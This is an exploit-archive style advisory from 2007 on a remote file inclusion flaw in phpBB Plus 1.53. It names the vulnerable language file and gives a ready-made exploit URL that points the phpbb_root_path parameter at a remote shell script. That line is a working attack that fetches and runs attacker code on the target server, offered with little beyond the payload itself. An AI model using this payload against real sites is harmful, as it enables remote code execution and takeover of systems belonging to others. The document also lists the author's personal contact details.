phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln
# Published : 2007-09-20
# Author : Mehrad
# Previous Title : CMS Made Simple 1.2 Remote Code Execution Vulnerability
# Next Title : Flip <= 3.0 Remoe Admin Creation Exploit

AUTHOR = Mehrad Ansari Targhi
E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang
_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

# www.Syue.com [2007-09-20]